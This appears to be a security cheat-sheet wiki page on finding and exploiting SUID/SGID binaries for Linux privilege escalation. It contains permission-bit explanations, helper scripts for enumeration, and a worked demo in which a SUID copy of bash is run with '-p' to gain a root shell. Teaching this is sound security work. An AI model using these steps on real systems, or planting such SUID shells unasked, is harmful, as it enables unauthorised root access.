exploiting suid guid files - dvanmosselbeen/security-cheat-sheet GitHub Wiki

Exploiting SUID/SGID Files

Finding and Exploiting SUID Files

A standard early step in Linux privilege escalation is to look for files with the SUID or SGID bit set. Such a file runs with the effective user ID (or group ID) of its owner (or owning group) rather than that of the user who executed it; when the owner is root, that means as the super-user. If we can make such a binary spawn a shell, or otherwise do our bidding, we inherit those privileges!

What is an SUID binary?

In Linux everything is a file, including directories and devices, and every file carries permissions that allow or restrict three operations: read, write and execute. Each of these is granted separately to three classes of user: the owner, the owning group and everyone else (other), so when you set permissions on a file you are deciding, for each class, which of the three operations it gets. This is how the maximum set of permissions (rwx-rwx-rwx) breaks down:

  • r = read
  • w = write
  • x = execute

  user   group  other
  rwx    rwx    rwx
  421    421    421

The maximum value for each class is 7, the sum of read (4), write (2) and execute (1). For example, chmod 755 yields rwxr-xr-x: everything for the owner, read and execute for the group and for everyone else.

The special permissions live in a fourth, leading octal digit: 4 sets the set-user-ID bit (SUID) and 2 sets the set-group-ID bit (SGID); 1 is the sticky bit. So chmod 4755 produces a SUID binary and chmod 2755 an SGID one; the symbolic equivalents are chmod u+s and chmod g+s. A SUID executable runs with the effective user ID of its owner instead of that of the user who launched it, and SGID does the same for the group.

Therefore, in ls -l output the thing to look for is an s in the execute slot of the owner or group triplet:

  • SUID: rws-rwx-rwx (for example -rwsr-xr-x)
  • SGID: rwx-rws-rwx (for example -rwxr-sr-x)

A capital S in that slot means the special bit is set but the execute bit is not: the file cannot be run, so the bit is harmless.
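To make the mapping between the octal digits and the ls -l string concrete, here is an added example (not code from the original page) that renders an octal mode the way ls prints it, including the s/S distinction above. The function names (pad_mode, triplet, mode_to_symbolic, has_suid_or_sgid) are this example's own; it goes slightly beyond the text by also handling the sticky bit (t/T) in the "other" slot.

```sh
#!/bin/sh
# Added example (not code from the original page): render an octal mode such
# as 4755 the way ls -l shows it, so the effect of the set-user-ID (4000),
# set-group-ID (2000) and sticky (1000) bits on the rwx triplets is visible.
# Lowercase s/t means the special bit AND the execute bit are set; uppercase
# S/T means the special bit is set without execute, so the file cannot be run
# and a SUID/SGID bit on it gives an attacker nothing.

# pad_mode OCTAL -> the mode left-padded to four digits (special,owner,group,other)
pad_mode() {
    mode=$1
    while [ "${#mode}" -lt 4 ]; do mode="0${mode}"; done
    printf '%s' "$mode"
}

# triplet DIGIT SPECIAL LOWER UPPER
#   DIGIT        one permission digit (0-7) for owner, group or other
#   SPECIAL      non-zero when this class's special bit is set
#   LOWER/UPPER  the character to put in the execute slot (s/S or t/T)
triplet() {
    digit=$1 special=$2 lower=$3 upper=$4 out=""
    if [ $((digit & 4)) -ne 0 ]; then out="${out}r"; else out="${out}-"; fi
    if [ $((digit & 2)) -ne 0 ]; then out="${out}w"; else out="${out}-"; fi
    if [ "$special" -ne 0 ]; then
        # special bit present: s/t replaces x, capitalised when x is missing
        if [ $((digit & 1)) -ne 0 ]; then out="${out}${lower}"; else out="${out}${upper}"; fi
    elif [ $((digit & 1)) -ne 0 ]; then
        out="${out}x"
    else
        out="${out}-"
    fi
    printf '%s' "$out"
}

# mode_to_symbolic OCTAL -> nine-character string such as rwsr-xr-x
# (the leading file-type character that ls prints is omitted)
mode_to_symbolic() {
    mode=$(pad_mode "$1")
    sp=$(printf '%s' "$mode" | cut -c1)
    u=$(printf '%s' "$mode" | cut -c2)
    g=$(printf '%s' "$mode" | cut -c3)
    o=$(printf '%s' "$mode" | cut -c4)
    printf '%s%s%s\n' \
        "$(triplet "$u" $((sp & 4)) s S)" \
        "$(triplet "$g" $((sp & 2)) s S)" \
        "$(triplet "$o" $((sp & 1)) t T)"
}

# has_suid_or_sgid OCTAL -> exit status 0 when the 4000 or 2000 bit is set
has_suid_or_sgid() {
    sp=$(pad_mode "$1" | cut -c1)
    [ $((sp & 6)) -ne 0 ]
}

# Walk a few constructed modes: plain, SUID, SGID, both, SUID without x, sticky.
for m in 755 4755 2755 6755 4644 1777; do
    if has_suid_or_sgid "$m"; then flag="<- SUID/SGID"; else flag=""; fi
    printf '%-5s %s %s\n' "$m" "$(mode_to_symbolic "$m")" "$flag"
done
```

Note that 4644 comes out as rwSr--r--: the bit is set, but with no execute permission the file is not a usable SUID program, which is why the find one-liner further down should be read together with the mode ls shows.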

Finding SUID Binaries

Enumeration scripts such as LinEnum already list SUID files for us. To do it by hand, use: find / -perm -u=s -type f 2>/dev/null. That matches files with the SUID bit only; replace -u=s with -g=s to look for SGID files, or use -perm /6000 (GNU find) to catch either. Let's break down this command.

  • find - Initiates the "find" command
  • / - Searches the whole file system
  • -perm - Matches files by their permission bits
  • -u=s - The set-user-ID bit must be set on the file. With a leading - before the mode, find requires all of the listed bits to be set; symbolic modes such as u=s are accepted in this form
  • -type f - Only search for regular files
  • 2>/dev/null - Sends errors (stderr) to /dev/null. As without this we will get a lot of
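The following is an added example, not code from the original page: it builds a throwaway directory with a few constructed files (paths and names are this example's own) and then runs the same kind of find search against it that you would run against / on a real host, so the result can be checked against known modes. It uses -perm -4000 / -perm -2000 rather than -u=s, and joins them with -o, which works on both GNU and BSD find; the second function narrows the hits to root-owned SUID files that the current (unprivileged) user can actually execute.

```sh
#!/bin/sh
# Added example (not code from the original page): build a throwaway directory
# holding a few constructed files, then hunt for the SUID/SGID ones with find
# exactly as you would against / on a real box. `-perm -4000` matches files
# with the set-user-ID bit, `-perm -2000` the set-group-ID bit (the leading
# "-" means "all of these bits must be set"); the -o form works on both GNU
# and BSD find, whereas GNU find also accepts the shorter `-perm /6000`.

# make_fixture -> prints the path of a new temp dir containing:
#   plain        0755  ordinary executable
#   suid_bin     4755  set-user-ID, executable
#   sgid_bin     2755  set-group-ID, executable
#   suid_noexec  4644  set-user-ID without execute (shows as rwS, not runnable)
make_fixture() {
    dir=$(mktemp -d) || return 1
    printf '#!/bin/sh\nid\n' > "$dir/plain"
    for f in suid_bin sgid_bin suid_noexec; do cp "$dir/plain" "$dir/$f"; done
    chmod 0755 "$dir/plain"
    chmod 4755 "$dir/suid_bin"
    chmod 2755 "$dir/sgid_bin"
    chmod 4644 "$dir/suid_noexec"
    printf '%s\n' "$dir"
}

# find_special_bins ROOT -> paths of regular files under ROOT with the SUID
# or SGID bit set, one per line, sorted. stderr (the "Permission denied"
# noise you get when ROOT is /) is discarded, like the 2>/dev/null above.
find_special_bins() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# find_suid_root_exec ROOT -> the subset worth a closer look on a real host:
# owned by root, SUID, and executable by "other" (i.e. by the low-privilege
# user you currently are). In the fixture the files are owned by whoever runs
# this script, so this only returns hits when run as root.
find_suid_root_exec() {
    find "$1" -type f -user root -perm -4000 -perm -o=x 2>/dev/null | sort
}

# Demo: list mode, owner and path for every hit in the fixture, then clean up.
fixture=$(make_fixture)
find_special_bins "$fixture" | while read -r path; do ls -ld "$path"; done
rm -rf "$fixture"
```

On a real target replace the fixture path with / and look at the ls -ld line for each hit: the owner column tells you whose privileges you would gain, and an s (not S) in the owner's execute slot tells you the bit is actually effective.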

Exploitation Examples

TODO: Find a good example!

For example, in this configuration test, as the root user I have f*cked up the thing on purpose, for illustration: by copying bash to a temporary location and setting the SUID and SGID bits:

# whereis bash
bash: /bin/bash /etc/bash.bashrc /usr/share/man/man1/bash.1.gz
# ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.1M Apr  4  2018 /bin/bash
# cp /bin/bash /tmp/
# chmod ug+s /tmp/bash
# ls -lah /tmp/bash
-rwsr-sr-x 1 root root 1.1M Aug 19 08:29 /tmp/bash

Now, as an unprivileged user, execute the copied bash with -p. The -p (privileged) flag matters: when bash starts with an effective UID that differs from the real UID it resets the effective UID to the real one, silently throwing the SUID privilege away, unless -p is given. With -p the effective UID of 0 is kept and we have root:

user8@polobox:~$ /tmp/bash -p
bash-4.4# whoami
root
bash-4.4# id
uid=1007(user8) gid=1007(user8) euid=0(root) egid=0(root) groups=0(root),1007(user8)
bash-4.4#

Resources